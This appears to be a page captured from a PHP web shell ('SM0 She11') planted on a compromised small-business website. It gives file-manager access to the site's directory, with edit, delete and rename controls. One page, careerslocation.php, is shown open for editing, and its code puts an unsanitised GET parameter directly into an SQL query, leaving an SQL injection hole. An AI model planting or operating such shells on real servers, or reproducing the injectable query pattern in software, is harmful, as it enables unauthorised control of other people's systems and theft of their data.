SM0 She11
Path:
/
/
home
/
saienerg
/
public_html
Full Path (server): /home/saienerg/public_html
Create Fil3
Upl04d Fil3
📄 .DS_Store
[E]
[D]
[R]
📄 .ftpquota
[E]
[D]
[R]
📄 .htaccess
[E]
[D]
[R]
📄 .htaccessold
[E]
[D]
[R]
📄 .user.ini
[E]
[D]
[R]
📁 SpryAssets
Open
[D]
[R]
📄 about-ramesh.php
[E]
[D]
[R]
📄 about-sivakumar.php
[E]
[D]
[R]
📄 about-thangaraju.php
[E]
[D]
[R]
📄 about-venkat.php
[E]
[D]
[R]
📄 aboutus.php
[E]
[D]
[R]
📄 affected.zip
[E]
[D]
[R]
📄 careercopy.php
[E]
[D]
[R]
📄 careerpost.php
[E]
[D]
[R]
📄 careers.php
[E]
[D]
[R]
📄 careersapplynow.php
[E]
[D]
[R]
📄 careerslocation.php
[E]
[D]
[R]
📄 cat-photo.php
[E]
[D]
[R]
📄 class.phpmailer.php
[E]
[D]
[R]
📄 class.smtp.php
[E]
[D]
[R]
📄 clients.php
[E]
[D]
[R]
📄 cmn_lib.php
[E]
[D]
[R]
📄 contactus.php
[E]
[D]
[R]
📁 css
Open
[D]
[R]
📁 demo
Open
[D]
[R]
📄 enquiry-omservice.php
[E]
[D]
[R]
📄 enquiry-otherservice.php
[E]
[D]
[R]
📁 enquiryupload
Open
[D]
[R]
📄 error_log
[E]
[D]
[R]
📄 event-details.php
[E]
[D]
[R]
📄 eventslist.php
[E]
[D]
[R]
📁 fonts
Open
[D]
[R]
📄 gallery-album.php
[E]
[D]
[R]
📄 gallery-photo.php
[E]
[D]
[R]
📄 gallery-video.php
[E]
[D]
[R]
📄 google11bb5e94a094932d.html
[E]
[D]
[R]
📁 images
Open
[D]
[R]
📁 img
Open
[D]
[R]
📁 include
Open
[D]
[R]
📄 index.html
[E]
[D]
[R]
📄 index.php
[E]
[D]
[R]
📄 index1.php
[E]
[D]
[R]
📁 intra
Open
[D]
[R]
📁 js
Open
[D]
[R]
📄 mail.php
[E]
[D]
[R]
📄 peformance_archives.php
[E]
[D]
[R]
📄 per-articles.php
[E]
[D]
[R]
📄 per-experiencelist-pre-OEM.php
[E]
[D]
[R]
📄 per-experiencelist-pre-direct.php
[E]
[D]
[R]
📄 per-experiencelist-services-dis.php
[E]
[D]
[R]
📄 per-experiencelist-services-energy.php
[E]
[D]
[R]
📄 per-experiencelist-services-special.php
[E]
[D]
[R]
📄 per-experiencelist-services-trou.php
[E]
[D]
[R]
📄 per-experiencelist.php
[E]
[D]
[R]
📄 per-listofcurrent.php
[E]
[D]
[R]
📄 per-monthlyperform.php
[E]
[D]
[R]
📄 per-servicecap.php
[E]
[D]
[R]
📄 php.ini
[E]
[D]
[R]
📄 products-details.php
[E]
[D]
[R]
📄 products-details1.php
[E]
[D]
[R]
📄 products.php
[E]
[D]
[R]
📄 products1.php
[E]
[D]
[R]
📄 products_old.php
[E]
[D]
[R]
📄 service.php
[E]
[D]
[R]
📄 site.js
[E]
[D]
[R]
📄 site.php
[E]
[D]
[R]
📄 ssl.php
[E]
[D]
[R]
📄 testmail.php
[E]
[D]
[R]
📄 top-footertop.php
[E]
[D]
[R]
📄 top-side-serviceslist.php
[E]
[D]
[R]
Editing: careerslocation.php
<!DOCTYPE html> <html lang="zxx"> <head> <?php include ("include/top-header.php");?> </head> <body> <?php include ("include/top-headerlogo.php");?> <div class="section banner-page about"> <div class="overlay"></div> <div class="container"> <div class="row"> <div class="col-sm-12 col-md-12"> <div class="title-page">Job Location</div> <ol class="breadcrumb"> <li><a href="index.php">Home</a></li> <li class="active">Career</li> </ol> </div> </div> </div> </div> <div class="section feature overlap"> <div class="container"> <div class="row"> <div class="col-md-12"><p style="color:red"><b>Please go through the details of your preferred Job Vacancy and click APPLY against the same to send your Job Application for the Job Vacancy you preferred. </b><p></div> <div class="col-md-12"> <?php $loc = $_GET['loc']; $tsql="select * from vacancy_list where loc_id='$loc' and status='0' "; $tqry=mysqli_query($idb,$tsql) ; if(mysqli_num_rows($tqry)>0) { $sno=1; while($row=mysqli_fetch_array($tqry)) { $jpos_id=$row['jpos_id']; $loc_id=$row['loc_id']; $eql_id=$row['eql_id']; $vcn_id=$row['vcn_id']; $jd_id = $row['jd_id']; $jrw = $obj->get_jobdescr($jd_id); ?> <div class="ba-career"> <div class="row"> <div class="col-md-12"><div class="job-box"><h4><?php echo $obj->get_job_position($jpos_id) ?></h4></div></div> <div class="col-md-3"> <h6>Job Location</h6> <h5><?php echo $obj->get_location($loc_id) ?></h5> <h6>Years of Experience</h6> <h5><?php echo $row['experience']; ?></h5> </div> <div class="col-md-2"> <h6>Job Code</h6> <h5><?php echo $jrw['jd_code']; ?></h5> <h6>Qualification</h6> <h5><?php echo $obj->get_edu_qualification($eql_id) ?></h5> </div> <div class="col-md-4"> <h6>No. of Job Vacancy</h6> <h5><?php echo $row['vcn_cnt']; ?></h5> <h6>Job Description</h6> <p class="text-justify"><?php echo $row['jb_descr']; ?></p> </div> <div class="col-md-2"> </div> <div class="col-md-2 text-center"> <a class="btn btn-danger" href="careersapplynow.php?job=<?php echo $vcn_id ?>">Apply Now</a> </div> </div> </div> <?php } } ?> </div> </div> </div> </div> <?php include ("include/top-footertop.php");?> <?php include ("include/top-footer.php");?> </body> </html>
Save